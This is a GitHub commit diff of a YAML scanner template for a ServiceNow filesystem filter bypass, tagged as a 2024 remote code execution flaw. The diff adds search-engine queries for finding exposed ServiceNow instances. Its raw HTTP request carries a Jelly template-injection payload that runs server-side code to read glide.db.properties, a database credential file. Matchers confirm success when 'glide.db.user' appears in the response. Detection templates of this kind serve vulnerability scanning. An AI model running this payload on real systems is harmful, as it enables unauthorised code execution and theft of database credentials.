minor-update
Dhiyaneshwaran
GitHub
parent
dfdc32e3a1
commit
20cb50d9f3
|
|
@ -4,16 +4,42 @@ info:
|
|||
name: Service Now - Filesystem Filter Bypass
|
||||
author: DhiyaneshDk
|
||||
severity: high
|
||||
reference:
|
||||
- https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data
|
||||
classification:
|
||||
cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: servicenow
|
||||
product: servicenow
|
||||
shodan-query:
|
||||
- http.favicon.hash:1701804003
|
||||
- http.title:"servicenow"
|
||||
fofa-query:
|
||||
- icon_hash=1701804003
|
||||
- title="servicenow"
|
||||
google-query: intitle:"servicenow"
|
||||
tags: cve,cve2024,servicenow,rce
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /login.do?jvar_page_title=<style><j:jelly xmlns:j="jelly:core" xmlns:g='glide'><g:evaluate>z=new Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1
|
||||
GET /login.do?jvar_page_title=<style><j:jelly+xmlns:j="jelly:core"+xmlns:g='glide'><g:evaluate>z=new+Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new+SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'db.user'
|
||||
- "glide.db.user"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
|||
Loading…
Reference in New Issue